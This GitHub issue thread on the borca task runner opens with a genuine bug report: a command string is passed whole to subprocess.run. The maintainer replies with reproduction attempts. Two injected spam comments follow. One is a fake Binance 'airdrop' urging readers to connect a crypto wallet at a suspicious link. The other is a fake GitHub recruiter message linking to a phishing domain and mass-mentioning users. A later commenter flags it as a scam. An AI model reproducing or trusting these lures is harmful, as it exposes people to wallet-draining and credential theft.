### ISSUE TITLE
Whole command is run

### ISSUE THREAD

**Issue by clintonroy** [AndrewSpittlemeister/borca#1]
I think I'm missing something:
```
[BORCA] INFO borca.Orchestrator - Using `pyproject.toml`
[BORCA] DEBUG borca.parsing.Parser - Task Order: ['test']
[BORCA] INFO borca.execution.Executor - Caching will neither be used or updated.
[BORCA] INFO borca.execution.Executor - Executing task: test
[BORCA] DEBUG borca.execution.Executor - Running command: pytest --cov=devpi_ldap_tags --cov-report html -o output
Traceback (most recent call last):
  File "/home/clintonr/.cache/pypoetry/virtualenvs/devpi-ldap-tags-aBDVa_Lw-py3.8/bin/borca", line 10, in <module>
    sys.exit(main())
  File "/home/clintonr/.cache/pypoetry/virtualenvs/devpi-ldap-tags-aBDVa_Lw-py3.8/lib/python3.8/site-packages/borca/__main__.py", line 18, in main
    orchestrator.run()
  File "/home/clintonr/.cache/pypoetry/virtualenvs/devpi-ldap-tags-aBDVa_Lw-py3.8/lib/python3.8/site-packages/borca/orchestrator.py", line 33, in run
    total_tasks, completed_tasks, cached_tasks = self.__executor.run()
  File "/home/clintonr/.cache/pypoetry/virtualenvs/devpi-ldap-tags-aBDVa_Lw-py3.8/lib/python3.8/site-packages/borca/execution/executor.py", line 84, in run
    proc = subprocess.run(command)  # nosec
  File "/usr/lib/python3.8/subprocess.py", line 489, in run
    with Popen(*popenargs, **kwargs) as process:
  File "/usr/lib/python3.8/subprocess.py", line 854, in __init__
    self._execute_child(args, executable, preexec_fn, close_fds,
  File "/usr/lib/python3.8/subprocess.py", line 1702, in _execute_child
    raise child_exception_type(errno_num, err_msg, err_filename)
FileNotFoundError: [Errno 2] No such file or directory: 'pytest --cov=devpi_ldap_tags --cov-report html -o output'

```

But rather than running pytest with arguments, it's trying to run 'pytest -arg one -arg two' etc.

**Comment by AndrewSpittlemeister** [comment]
Would you be able to post the borca section of your pyproject.toml file and how you are running the borca command? I'm not yet able to reproduce this with similar commands.

**Comment by clintonroy** [comment]
It is an internal project, but it's just so tiny I can get away with posting it :) I feel like I'm missing something rather simple and stupid at this stage.

```
 [tool.poetry]
name = "devpi-ldap-tags"
version = "0.1.0"
description = "devpi-server plugin, enables pyyaml-tags for use in devpi-ldap configuration"
authors = ["Clinton Roy <clintonr@ansto.gov.au>"]

[tool.poetry.dependencies]
python = "^3.8"
pyyaml-tags = "^1.0.4"

[tool.poetry.dev-dependencies]
pytest = "^5.3.5"
pytest-cov = "^2.8.1"
borca = "^2020.2"

[tool.poetry.plugins."devpi_server"]
devpi-ldap-tags = "devpi_ldap_tags.main"

[build-system]
requires = ["poetry>=0.12"]
build-backend = "poetry.masonry.api"

[tool.borca]
default_task = "test"

[[tool.borca.tasks]]
name = "test"
commands = ["pytest --cov=devpi_ldap_tags --cov-report html -o output"]
input_paths = ["src/*/*.py", "tests/*.py"]
```

**Comment by AndrewSpittlemeister** [comment]
I'm still having trouble reproducing this issue. I've been using a sample project with the following structure:
```
Project
├── pyproject.toml
├── borca_test
    └── __init__.py
├── tests
    ├── __init__.py
    └── test_version.py
```
where the `pyproject.toml` file looks:
```toml
[tool.poetry]
name = "borca-test"
version = "0.1.0"
description = "Example usage of borca"
authors = ["Andrew Spittlemeister <andrew.spittlemeister@gmail.com>"]
license = "MIT"

[tool.poetry.dependencies]
python = "^3.8"

[tool.poetry.dev-dependencies]
borca = "^2020.2"
pytest = "^5"
pytest-cov = "^2"

[tool.borca]
default_task = "build"

[[tool.borca.tasks]]
name = "build"
commands = [
    "python --version"
]
depends_on = [
    "test"
]
input_paths = ["./pyproject.toml"]

[[tool.borca.tasks]]
name = "test"
commands = ["pytest --cov=borca_test --cov-report html -o output"]

[build-system]
requires = ["poetry>=0.12"]
build-backend = "poetry.masonry.api"
```

There errors I am running into has to do with the format of the pytest command:
```
[BORCA] INFO borca.Orchestrator - Using pyproject.toml
[BORCA] DEBUG borca.parsing.Parser - Task Order: ['test']
[BORCA] INFO borca.execution.Executor - Caching will neither be used or updated.
[BORCA] INFO borca.execution.Executor - Executing task: test
[BORCA] DEBUG borca.execution.Executor - Running command: pytest --cov=borca_test --cov-report html -o output
ERROR: -o/--override-ini expects option=value style (got: 'output').

[BORCA] ERROR borca.execution.Executor - Error occurred in running command "pytest --cov=borca_test --cov-report html -o output" under task "test."
Command 'pytest --cov=borca_test --cov-report html -o output' returned non-zero exit status 4.
```

and correcting that by removing the `-o` option and pointing it to the correct test directory (in my case):
```toml
commands = ["pytest --cov=borca_test --cov-report html tests"]
```

I am able to get it to run just fine. and to be clear I am running it with the following command:
```
poetry run borca --no-hash --verbosity=2 test
```
But in any case, that is not where the problem is for you.

I'm not sure what else I could be missing, I will have to think on it for a bit and then maybe test it out on a linux machine when I get the chance.

**Comment by tobarbaro** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by rarents1975** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
ValMobYKang, @tommyjtl, @znuamaan, @saurabhaloneai, @bzssx, @loading1705, @MobinX, @ankitagr01, @frankroeder, @AbhinandanRoul, @nathannlu, @bistin, @Daniil675, @akashmjn, @ZQ-Dev8, @warchildmd, @eric-driverai, @Sageder, @liuhui201069, @codeofhk

**Comment by akashmjn** [comment]
Folks - if you've received this email be on scam alert especially the included link. 

I haven't clicked on it myself but the following looks very suspicious. Someone seems to have cleverly commented on an open/stale issue (google this author and repo) which sends you an email from the official GitHub domain. 

Take care!
